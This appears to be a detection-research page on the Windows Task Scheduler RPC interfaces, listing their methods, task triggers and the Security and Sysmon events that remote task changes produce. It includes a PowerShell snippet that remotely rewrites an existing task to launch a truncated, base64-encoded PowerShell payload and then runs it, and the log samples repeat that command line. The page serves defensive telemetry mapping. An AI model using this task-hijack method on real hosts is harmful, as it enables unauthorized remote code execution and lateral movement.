# Task Scheduler Service
The Task Scheduler service allows you to perform automated tasks on a chosen computer. With this service, you can schedule any program to run at a convenient time for you or when a specific event occurs.
## Task Scheduler Service Remote Protocol
## ITaskSchedulerService RPC Server
The ITaskSchedulerService interface uses the **ncacn_ip_tcp** RPC protocol sequence and RPC dynamic endpoints.
### RPC Server
* **Name**: ITaskSchedulerService
* **UUID**: 86d35949-83c9-4044-b424-db363231fd0c
* **FilePath**: C:\Windows\System32\schedsvc.dll
```
InterfaceId : 86d35949-83c9-4044-b424-db363231fd0c
InterfaceVersion : 1.0
TransferSyntaxId : 8a885d04-1ceb-11c9-9fe8-08002b104860
TransferSyntaxVersion : 2.0
ProcedureCount : 20
Procedures : {SchRpcHighestVersion, SchRpcRegisterTask, SchRpcRetrieveTask, SchRpcCreateFolder...}
Server : UUID: 86d35949-83c9-4044-b424-db363231fd0c
ComplexTypes : {Struct_0, Struct_1, Struct_3}
FilePath : C:\Windows\System32\schedsvc.dll
Name : schedsvc.dll
Offset : 510656
ServiceName : Schedule
ServiceDisplayName : Task Scheduler
IsServiceRunning : True
Endpoints : {[86d35949-83c9-4044-b424-db363231fd0c, 1.0] ncalrpc:[LRPC-4803de23b17986468a], [86d35949-83c9-4044-b424-db363231fd0c, 1.0] ncalrpc:[ubpmtaskhostchannel],
[86d35949-83c9-4044-b424-db363231fd0c, 1.0] ncalrpc:[LRPC-83a142d94b8e74a91a]}
EndpointCount : 3
Client : False
```
### RPC Clients
* taskcomp.dll
* taskschd.dll
* wmicmiplugin.dll
### RPC Methods
* SchRpcRegisterTask (Opnum 1)- The SchRpcRegisterTask method registers a task with the server (i.e. Updates).
* SchRpcRetrieveTask (Opnum 2) - The SchRpcRetrieveTask method returns a task definition.
* SchRpcRun (Opnum 12) - The SchRpcRun method runs a task specified by a path.
## ATSvc RPC Server
When using the ATSvc interface, the Task Scheduler Remoting Protocol client and server MUST specify **ncacn_np** as the RPC protocol sequence.
The ATSvc interface uses a well-known endpoint **\PIPE\atsvc**.
### RPC Server
* **Name**: ATSvc
* **UUID**: 1ff70682-0a51-30e8-076d-740be8cee98b
* **FilePath**: C:\Windows\System32\taskcomp.dll
```
InterfaceId : 1ff70682-0a51-30e8-076d-740be8cee98b
InterfaceVersion : 1.0
TransferSyntaxId : 8a885d04-1ceb-11c9-9fe8-08002b104860
TransferSyntaxVersion : 2.0
ProcedureCount : 4
Procedures : {NetrJobAdd, NetrJobDel, NetrJobEnum, NetrJobGetInfo}
Server : UUID: 1ff70682-0a51-30e8-076d-740be8cee98b
ComplexTypes : {Struct_0, Struct_1, Struct_2}
FilePath : C:\Windows\System32\taskcomp.dll
Name : taskcomp.dll
Offset : 322256
ServiceName :
ServiceDisplayName :
IsServiceRunning : False
Endpoints : {[1ff70682-0a51-30e8-076d-740be8cee98b, 1.0] ncalrpc:[LRPC-b858137bbb082a0e8d]}
EndpointCount : 1
Client : False
```
### RPC Clients
* mstask.dll
* schedcli.dll
### RPC Methods
* NetrJobAdd (Opnum 0)- The NetrJobAdd method MUST add a single AT task to the server's task store.
* NetrJobDel (Opnum 1) - The NetrJobDel method MUST delete a specified range of tasks from the task store. The method is capable of deleting all AT tasks or just a subset of the tasks, as determined by the values of the MinJobId and MaxJobId parameters.
* NetrJobEnum (Opnum 2) - The NetrJobEnum method MUST return an enumeration of all AT tasks on the specified server.
* NetrJobGetInfo (Opnum 3) - The NetrJobGetInfo method MUST return information for a specified ATSvc task. The task identifier MUST be used to locate the task configuration.
## Task Actions
* ComHandler Action - This action fires a COM handler.
* Exec Action - This action executes a command-line operation such as starting Notepad.
* E-mail Action - This action sends an email when a task is triggered.
* Show Message Action - This action shows a message box with a specified message and title.
## Task Triggers
* TASK_TRIGGER_EVENT - 0 - Starts the task when a specific event occurs.
* TASK_TRIGGER_TIME - 1 - Starts the task at a specific time of day.
* TASK_TRIGGER_DAILY - 2 - Starts the task daily.
* TASK_TRIGGER_WEEKLY - 3 - Starts the task weekly.
* TASK_TRIGGER_MONTHLY - 4 - Starts the task monthly.
* TASK_TRIGGER_MONTHLYDOW - 5 - Starts the task every month on a specific day of the week.
* TASK_TRIGGER_IDLE - 6 - Starts the task when the computer goes into an idle state.
* TASK_TRIGGER_REGISTRATION - 7 - Starts the task when the task is registered.
* TASK_TRIGGER_BOOT - 8 - Starts the task when the computer boots.
* TASK_TRIGGER_LOGON - 9 - Starts the task when a specific user logs on.
* TASK_TRIGGER_SESSION_STATE_CHANGE - 11 - Triggers the task when a specific session state changes.
## Interact with Task Scheduler Remotely
### Powershell - Schedule.Service COM Object
```Powershell
# connect to Task Scheduler:
$service = New-Object -ComObject Schedule.Service
$service.Connect("WORKSTATION6")
# Get task folder that contains tasks:
$folder = $service.GetFolder('\Microsoft\Windows\')
# Example: Root Task Container:
$folder = $service.GetFolder('\')
# Enumerate Specific Task
$ward0gtask = $folder.GetTask('Ward0g')
$alltasks = $folder.GetTasks(0)
# get task definition and change it (i.e Arguments)
$taskdefinition = $ward0gtask.Definition
$taskdefinition.Actions | ForEach-Object {$_.Path = "powershell"}
$taskdefinition.Actions | ForEach-Object {$_.Arguments = "-noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBpAE8AbgAuAE0AY...."}
# write back changed task definition:
# 4 = Update
$folder.RegisterTaskDefinition($task.Name, $taskdefinition, 4, $null, $null, $null)
# Execute Task
$NewTask = $folder.GetTask("Ward0g")
$NewTask.run.Invoke(@(''))
# Stop Task
$NewTask.stop(0)
```
## Security Event Logs
### Security Log
* EventID 4624: Successful Logon
* EventID 4702 (Target): A Scheduled Task Was updated
```xml
-
-
4702
1
0
12804
0
0x8020000000000000
2292968
Security
WORKSTATION6.theshire.local
-
S-1-5-21-3786818125-2382361537-3207726629-1104
pgustavo
THESHIRE
0x9ac216f
\Ward0g
2020-12-16T08:09:21.4521839 THESHIRE\sbeavers Que pasa \Ward0g true S-1-5-21-3786818125-2382361537-3207726629-1106 InteractiveToken LeastPrivilege IgnoreNew true true true false false true false true true false false false PT72H 7 powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBwAt.....
0
0
0
0
WORKSTATION6.theshire.local
```
* EventID 4688 (Target): A New Process Has been created
### Microsoft-Windows-TaskScheduler/Operational Logs
* EventID 140: Task Rergistration Updated
* EventID 100: Task Started
* EventID 201: Action Completed
* EventID 201: Task Completed
* EventID 111: Task Terminated
* EventID 332: Launch request ignored. Instance already running
## Sysmon
* EventID 1: ProcessCreate (When Task is stopped)
```xml
-
-
1
5
4
1
0
0x8000000000000000
9090341
Microsoft-Windows-Sysmon/Operational
WORKSTATION6.theshire.local
-
-
2020-12-16 17:23:48.185
{649442b8-42a4-5fda-af62-000000000600}
2836
C:\Windows\System32\taskhostw.exe
10.0.18362.1237 (WinBuild.160101.0800)
Host Process for Windows Tasks
Microsoft® Windows® Operating System
Microsoft Corporation
taskhostw.exe
taskhostw.exe C:\windows\System32\WindowsPowerShell\v1.0\powershell.EXE -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBpAE8AbgAuAE0AYQBqAE8AcgAgAC0AZwBFACAAMwApAHsAJAA4...
C:\windows\system32\
THESHIRE\sbeavers
{649442b8-783d-5fd2-c316-e00000000000}
0xe016c3
2
Medium
SHA1=6630F5E1A1ACC1C8E95A7958542DD87D0735D99B,MD5=52071D9553A92A12F22DDDF6DB6F9643,SHA256=ABCA3394728697205DEAD7C9B7B9076CDD28BEE84E7A3C84514478BC033E531A,IMPHASH=9CB27CAED52CB0AFFB32788922A0D083
{649442b8-52dc-5fd1-3600-000000000600}
2220
C:\Windows\System32\svchost.exe
C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
```
* EventID 1: ProcessCreate (Execution when task is forced to execute or task is updated)
```xml
-
-
1
5
4
1
0
0x8000000000000000
9103725
Microsoft-Windows-Sysmon/Operational
WORKSTATION6.theshire.local
-
-
2020-12-16 17:40:05.997
{649442b8-4675-5fda-d962-000000000600}
6840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.18362.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
PowerShell.EXE
C:\windows\System32\WindowsPowerShell\v1.0\powershell.EXE -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBpAE8AbgAuAE0AYQBqAE8AcgAgAC0AZwBFACAAMwAp...
C:\windows\system32\
THESHIRE\sbeavers
{649442b8-783d-5fd2-c316-e00000000000}
0xe016c3
2
Medium
SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481
{649442b8-52dc-5fd1-3600-000000000600}
2220
C:\Windows\System32\svchost.exe
C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
```
EventID 7: Image Loaded
* taskcomp.dll
* taskschd.dll
* wmicmiplugin.dll
* mstask.dll
* schedcli.dll
## References
* https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-TSCH/%5BMS-TSCH%5D-170915-diff.pdf
* https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/eb12c947-7e20-4a30-a528-85bc433cec44
* https://docs.microsoft.com/en-us/windows/win32/taskschd/displaying-task-names-and-state--scripting-
* https://docs.microsoft.com/en-us/windows/win32/taskschd/trigger-type
* https://docs.microsoft.com/en-us/windows/win32/taskschd/tasksettings
* https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/fbab083e-f79f-4216-af4c-d5104a913d40
* https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/4d44c426-fad2-4cc7-9677-bfcd235dca33